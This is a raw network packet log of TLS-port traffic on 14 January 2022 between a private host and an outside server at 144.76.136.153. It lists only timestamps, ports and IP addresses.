Jan 14, 2022 00:16:04.318592072 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.318628073 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.318662882 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.318670034 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.318694115 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.318713903 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.319019079 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.319053888 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.319093943 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.319104910 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.319125891 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.319145918 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.327090979 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.327130079 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.327223063 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.327254057 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.327274084 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.327306032 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.331722021 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.331758022 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.331872940 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.331897974 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.331913948 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.332566977 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.332601070 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.332652092 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.332676888 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.332690954 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.333436966 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.333508968 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.333545923 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.333586931 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.333597898 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.333635092 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.333652020 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.344382048 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.344429016 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.344496012 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.344525099 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.344546080 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.344583988 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.344712019 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.344749928 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.344794035 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.344805002 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.344820976 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.345074892 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.345108986 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.345159054 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.345180035 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.345195055 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.345235109 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.345561981 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.345623016 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.345637083 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.345649004 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.345690966 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.345714092 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.345825911 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.345882893 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.345896006 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.345907927 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.345953941 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.345969915 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.346214056 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.346256971 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.346290112 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.346298933 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.346333027 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.346347094 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.346616030 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.346656084 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.346693039 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.346709967 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.346724033 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.346997023 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.347033024 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.347065926 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.347078085 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.347106934 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.347131014 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.352514029 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.352560043 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.352607012 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.352619886 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.352646112 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.352663040 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.356537104 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.356575012 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.356625080 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.356638908 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.356654882 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.356678009 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.357054949 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.357093096 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.357126951 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.357134104 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.357165098 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.357182026 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.357461929 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.357501030 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.357532024 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.357538939 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.357563972 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.357585907 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.370126963 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.370981932 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.371020079 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.371081114 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.371093035 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.371124983 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.371150970 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.371352911 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.371390104 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.371437073 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.371443987 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.371474028 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.371493101 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.371748924 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.371784925 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.371828079 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.371840000 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.371879101 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.371913910 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.372126102 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.372164011 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.372205973 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.372214079 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.372261047 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.372282028 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.372488976 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.372525930 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.372565985 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.372571945 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.372601032 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.372617006 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.372905016 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.372946978 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.372978926 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.372984886 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.373017073 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.373033047 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.373307943 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.373343945 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.373388052 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.373418093 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.373425007 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.373492002 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.373672962 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.373711109 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.373754978 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.373761892 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.373790979 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.373809099 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.381918907 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.381958961 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.382004023 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.382018089 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.382045984 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.382061005 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.382210016 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.382247925 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.382276058 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.382282019 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.382311106 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.382327080 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.382544041 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.382581949 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.382616997 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.382626057 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.382641077 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.383009911 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.383091927 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.383109093 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.383120060 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.383162975 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.398997068 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.399039030 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.399097919 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.399111986 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.399139881 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.399154902 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.399390936 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.399429083 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.399463892 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.399470091 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.399503946 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.399523020 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.399781942 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.399817944 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.399853945 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.399859905 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.399888039 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.399908066 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.400202036 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.400238991 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.400271893 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.400276899 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.400305986 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.400322914 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.400576115 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.400614977 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.400649071 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.400655031 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.400696993 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.400715113 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.400994062 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.401031017 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.401063919 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.401073933 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.401099920 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.401149988 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.401314974 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.401350975 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.401391029 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.401397943 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.401429892 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.401449919 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.401688099 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.401745081 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.401803970 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.401809931 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.401843071 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.401866913 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.407897949 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.407938004 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.407991886 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.408011913 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.408039093 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.408057928 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.408200026 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.408230066 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.408276081 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.408282042 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.408323050 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.408484936 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.408516884 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.408540964 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.408545971 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.408560038 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.408608913 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.423386097 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.423429966 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.423485041 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.423501015 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.423521042 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.423547029 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.426879883 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.426918030 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.426976919 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.426990032 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.427022934 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.427042961 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.427223921 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.427261114 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.427304983 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.427310944 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.427340984 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.427361965 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.427628040 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.427701950 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.427759886 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.427769899 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.427793980 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.427824974 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.427992105 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.428029060 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.428071976 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.428077936 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.428112984 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.428375006 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.428409100 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.428427935 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.428435087 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.428448915 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.428483963 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.428510904 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.428797007 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.428833961 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.428874969 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.428880930 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.428899050 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.428936005 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.429177999 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.429229975 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.429258108 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.429263115 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.429303885 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.429505110 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.429539919 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.429554939 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.429560900 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.429574013 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.429620028 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.429647923 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.433717012 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.433790922 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.433825970 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.433839083 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.433871984 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.433912992 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.434212923 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.434253931 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.434309959 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.434317112 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.434351921 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.434372902 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.434886932 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.434923887 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.434988022 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.435000896 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.435043097 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.435059071 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.448513031 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.448553085 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.448637962 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.448653936 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.448678970 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.448700905 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.454680920 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.454722881 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.454778910 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.454796076 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.454827070 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.454847097 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.455008984 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.455044031 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.455090046 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.455099106 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.455131054 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.455152988 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.455363989 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.455401897 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.455446005 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.455451965 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.455487013 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.455508947 CET	49896	443	192.168.2.4	144.76.136.153
Jan 14, 2022 00:16:04.455725908 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.455765009 CET	443	49896	144.76.136.153	192.168.2.4
Jan 14, 2022 00:16:04.455809116 CET	49896	443	192.168.2.4	144.76.136.153
